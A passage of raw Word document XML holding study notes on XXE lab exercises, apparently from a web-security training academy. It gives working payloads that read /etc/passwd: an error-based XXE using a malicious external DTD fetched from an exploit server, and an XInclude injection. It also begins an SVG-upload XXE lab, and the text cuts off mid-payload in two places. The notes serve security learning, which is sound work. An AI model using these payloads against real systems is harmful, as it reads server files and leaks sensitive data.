        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Loads the contents of /etc/passwd into the parameter entity %file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F18D975" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A" w:rsidP="00A85D3B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;!ENTITY % eval "&lt;!ENTITY &amp;#x25; exfil SYSTEM 'file:///invalid/%file;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716E0E8F" w14:textId="3D18DA62" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>%eval defines another parameter entity called %exfil.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26317192" w14:textId="0DE83D1C" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>It tries to access a path like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218AB5A3" w14:textId="7C30317F" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>file:///invalid/&lt;contents-of-passwd&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475B08AA" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00A85D3B" w:rsidRDefault="001E336A" w:rsidP="00A85D3B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>eval;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7B13912C" w14:textId="4684587F" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="001E336A" w:rsidP="00A85D3B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exfil;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="38B54B7B" w14:textId="77777777" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>%eval; expands into the definition of %exfil.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1D8953" w14:textId="77777777" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>%exfil; tries to resolve the invalid path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE4BCDE" w14:textId="4CC575E6" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Because the path is invalid, the parser throws an error message, which includes the actual file contents substituted into the path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599B4715" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>When imported, this page will read the contents of /etc/passwd into the file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>entity, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t xml:space="preserve"> then try to use that entity in a file path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3502E1FF" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Click "View exploit" and take a note of the URL for your malicious DTD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA4C6A8" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>You need to exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. First, visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E65FEC3" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Insert the following external entity definition in between the XML declaration and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>stockCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t> element:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EB4F9D" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [&lt;!ENTITY % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "YOUR-DTD-URL"&gt; %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8C633B" w14:textId="5989B203" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> fetches the malicious DTD from the exploit server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF87023" w14:textId="46D1290C" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="001E336A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>The malicious DTD then runs the steps above → file read → error → leaked in response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCDF584" w14:textId="02BA3FC9" w:rsidR="001E336A" w:rsidRDefault="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>You should see an error message containing the contents of the /etc/passwd file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3752832B" w14:textId="77777777" w:rsidR="00A85D3B" w:rsidRPr="00B1101F" w:rsidRDefault="00A85D3B"/>
    <w:p w14:paraId="1B00840B" w14:textId="3B70F99A" w:rsidR="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Exploiting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>XInclude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> to retrieve files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42486BA9" w14:textId="77777777" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>XInclude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F570ABC" w14:textId="77777777" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>XInclude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> (XML Inclusion) is a W3C feature that lets you merge external files into an XML document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7943AE0D" w14:textId="77777777" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Instead of declaring an entity in a DTD (&lt;!ENTITY ...&gt;), you use an XML element:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34792E52" w14:textId="77777777" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>xi:include</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">="file:///etc/passwd" parse="text" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>xmlns:xi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>="http://www.w3.org/2001/XInclude"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A297999" w14:textId="569C483F" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>The parser sees this tag and literally says: “Oh, I need to go fetch /etc/passwd and include its contents here.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF5CDB8" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>This lab has a "Check stock" feature that embeds the user input inside a server-side XML document that is subsequently parsed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E1F366" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>Because you don't control the entire XML document you can't define a DTD to launch a classic XXE attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51434494" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>To solve the lab, inject an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>XInclude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t> statement to retrieve the contents of the /etc/passwd file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAAC845" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> Hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED1C51F" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>By default, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>XInclude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t> will try to parse the included document as XML. Since /etc/passwd isn't valid XML, you will need to add an extra attribute to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>XInclude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t xml:space="preserve"> directive to change this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A35EFE5" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t> Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62410299" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:lastRenderedPageBreak/>
        <w:t>Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730DA2B0" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Set the value of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t> parameter to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D27247C" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00A85D3B" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;foo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xmlns:xi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>="http://www.w3.org/2001/XInclude"&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xi:inclu</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="665A089D" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1E9F57" w14:textId="5A85DD0B" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Exploiting XXE via image file upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A064DD1" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE41CE6" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the "Submit solution" button to submit the value of the server hostname.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30357275" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> Hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D74B040" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>The SVG image format uses XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E8D8F8" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t> Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D87D49" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Create a local SVG image with the following content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4B0F2B" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00A85D3B" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
